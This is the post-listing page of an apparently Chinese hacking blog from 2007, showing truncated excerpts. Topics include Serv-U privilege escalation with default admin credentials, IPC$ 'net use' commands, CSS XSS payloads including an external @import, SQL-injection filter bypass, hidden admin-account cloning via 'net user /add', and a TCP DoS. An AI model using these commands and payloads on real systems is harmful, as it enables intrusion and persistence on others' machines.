- 博客(18)
- 资源 (3)
- 收藏
- 关注
RSS订阅原创 找出IIS中隐藏的网站
进入正题之前,我们先来看一下,入侵者是如何在我们的主机上建立隐藏网站的。 打开IIS的管理器->选定一个文件夹->点击鼠标右键->选择“资源管理器”,切换到网站的根目录,新建一个文件夹这里取名为“liuqq”,接着我们到“x:/windows/system32”(当然这个目录是任意的,其中的x代表系统盘)那里新建一个文件夹取名“liuhack”,回到IIS的管理器刷新就会看到,“liuq
2007-10-31 18:32:00
1291
原创 BHO 劫持 LSP劫持
为什么“浏览器劫持”能够如此猖狂呢?放眼众多论坛的求助贴,我们不时可以看到诸如“我的IE被主页被改了,我用杀毒工具扫了一遍都没发现病毒,我把主页改回自己的地址,可是一重启它又回来了!”、“我的系统一开机就跳出一个广告,我明明用了最新版的杀毒软件的啊!”等这类关于IE异常问题的求助,80%的提问者都表示纳闷,他们已经安装了杀毒软件,可是IE仍然被“黑”了,这又是为什么?其实这些都是典型的“
2007-10-22 21:03:00
3971
1
原创 通过路由器建立局域网的设置问题
1、设置路由器:将路由器中的DNCP(动态分配ip地址)关掉。其他设置默认就可以了。 2、设置TCP/IP协议:ip地址-两个机器的ip地址要在同一段内,比如192.168.2.2和192.168.2.3;网关-路由器地址,路由器的默认地址,比如192.168.2.1;子网掩码-255.255.255.0;DNS服务器:首选地址和备用地址,根据当地提供网络的公司不同而不同,有一些不需
2007-10-22 20:51:00
2535
原创 CMD命令大全
net use [url=file://ip/ipc$]//ip/ipc$[/url] " " /user:" " 建立IPC空链接 net use [url=file://ip/ipc$]//ip/ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 net use h: [url=file://ip/c$]//ip/c$[/url] "密码" /user:"用户名" 直接
2007-10-20 09:59:00
601
原创 Serv-u6.0提权的新玩法
适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。限制:没有更改管理员的密码,或者破解出了Serv-U 的管理员的密码。Serv-U默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 下面用 MSWinsock.Winsock建立一个连接,并且以System权限添加超级用户,代码如下:以下是引用片段:Dim revdata
2007-10-20 09:49:00
1142
原创 MSWinsock.Winsock的应用
现在分析一下VBS的运作原理吧。VBS的全称是“Visual Basic Scripts”,由于VBS是由Visual Basic分离出来的一种面向对象的脚本语言,所以它的语法与Visual Basic差不多,而且也是靠Object来实现它的其它高级功能。只不过是VBS是用Wscript.exe或Cscript.exe来解释的,因此它不需要编译,直接运行就行了,所以这也是VBS脚本做黑客工具方面的
2007-10-20 09:48:00
5621
2
原创 样式表得 IDS 绕过
(1)利用CSS代码@import、expression触发XSS漏洞。例1:@import "http://hi.baidu.com/jc123/xss.css"; 导入外部带有XSS代码的CSS样式表。例2:@importjavascript:alert("xss"); 调用javascript脚本触发漏洞例3:body{xss:expression(alert(xss))}
2007-10-18 18:52:00
1085
原创 穿透还原卡和还原软件的代码
还原卡和还原软件被广泛运用于各种公共场合的电脑上,比如学校机房和网吧。这些还原卡和还原软件(以下我简称为虚拟还原技术)能够记录下一切对硬盘的写操作,不论您对硬盘进行拷贝还是移动删除甚至是格式化分区等操作,只要一重新启动,一切都会恢复到这个操作之前的情况,因此有些虚拟还原厂商还会在广告词中加上一句“可以防范一切电脑病毒”。这种虚拟还原的方法在大部分时候的确可以对公共机房的电脑起到很好的保护作用,难道
2007-10-18 18:45:00
858
原创 组建DHCP、WINS、DNS服务器的几点认识
如果一台机子要连接到网络,就要它从所在的子网获得IP地址,通过TCP/IP协议连入网络中,这就需要它所在的子网中有至少一台DHCP服务器为它提供IP地址,即当某一台没有静态IP地址的机子要联入网中时,DCHP服务器会自动给它一个动态IP 。在网络中,如果要查找一台机子,而又不知道它的IP地址时,就需要另一种服务器去解析机器名称和它的IP地址,从而实现IP地址和计算机名称之间的映射,这就产生了几种用
2007-10-18 18:44:00
4792
原创 突破SQL注入限制的一点想法
大部分的防注入程序都过滤了以下关键字:and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | = 而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。对于关键字的过滤,以下是我收集的以及
2007-10-14 11:17:00
628
原创 利用scripts目录的可执行权限??????
原理是Scripts目录是IIS下的可运行目录,权限就是我们梦寐以求的SYSTEM权限。常见的使用方法就是在U漏洞时代我们先上传idq.dll到IIS主目录下的Scripts目录,然后用ispc.exe进行连接,就可以拿到system权限,不过这个是在Microsoft出了SP3之后就行不通了,其实我们仍可以利用此目录,只要我们上传别的木马到此目录,我举个例子就比如是winshell好了。然后我们
2007-10-14 11:07:00
758
原创 检测某账户对默认权限目录是否可写的脚本
文章作者:无敌最寂寞[E.S.T]信息来源:邪恶八进制 中国在web入侵后,经常会寻找一个可写目录上传webshell或者其它东西,这是一个关键的问题.大部分管理员对一些系统目录做了权限的更改设置,但是有很少管理员会对所有的目录都更改权限的(好麻烦的工作,至少我不会).那么如何确定一个账户的默认权限对哪些目录居然可以写权限呢?黑病毒兄在文章中估计是手工尝试的吧?其实当我们装好一个系统后,系统盘下的
2007-10-14 10:56:00
514
原创 TCP协议堵塞窗口算法攻击
TCP协议堵塞窗口算法攻击 TCP协议层次关于堵塞窗口的算法存在容易受攻击的漏洞这种攻击是基于协议层次的,因此任何实现tcp的系统都会受到影响。危害性: 通过制造堵塞,能够使受攻击的主机不能与任何指定的主机进行正常的tcp层次的数据传输。这类攻击的后果将是使所有的TCP服务(包括web、mail、FTP等)都会产生拒绝服务。攻击的方法有两到三种,没有任何补丁可以用来防止这种攻击,
2007-10-14 10:42:00
1049
原创 木马4天入侵10万电脑
该病毒入侵用户电脑后,会自行修改文件夹选项,并将隐藏文件夹选项中隐藏文件和文件夹菜单下正常的显示替换成“禽兽尚且有半点怜悯之心,而我一点没有,所以我不是禽兽”。 木马4天入侵10万电脑 " style="BORDER-RIGHT: black 1px solid; BORDER-TOP: black 1px
2007-10-14 10:12:00
519
原创 linux下mysql 5.x得到root密码后的另外一种利用方式
mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的范围内。 一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如此这般。今天我们换一种方式。 按照上面的方法,我们需要知道web的绝
2007-10-07 21:50:00
555
原创 说一个隐蔽克隆帐号的方法
原理很简单的啊 sam的 FV键值吧 重点如何躲过检测一般的检测克隆帐号的都是检测 sam里面有没有相同的 FV吧 利用这个特性绕过检测吧 呵呵步骤1.net user allyesno freexploit /add&net localgroup administrators allyesno /add2.clone allyesno->guest3.delete allyesno sa
2007-10-07 21:48:00
607
原创 serv-u的密码加密原理及破解
网上目前个人发现和搜集的专门破Serv-U密码的软件有3个,一个是脚本写的,运行速度太慢,这里就不拿出来来了,另外两个各有所长,一个是风蓝写的,一个是阿呆的。两者的区别在于前者靠的是大量的字典文件,一个个的实验,直到找到符合的密码(要是你平时有收集字典的喜好,那么现在就是使用的最好时候)。后者同样也是爆破,原理是穷举。 这里我们首先看看风蓝的,把弄到的密码填写进去,一本好的字典是最关
2007-10-03 09:20:00
4632
dos 汇编学习笔记(记录了很多小的细节和应该注意的东西)
2009-06-20
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人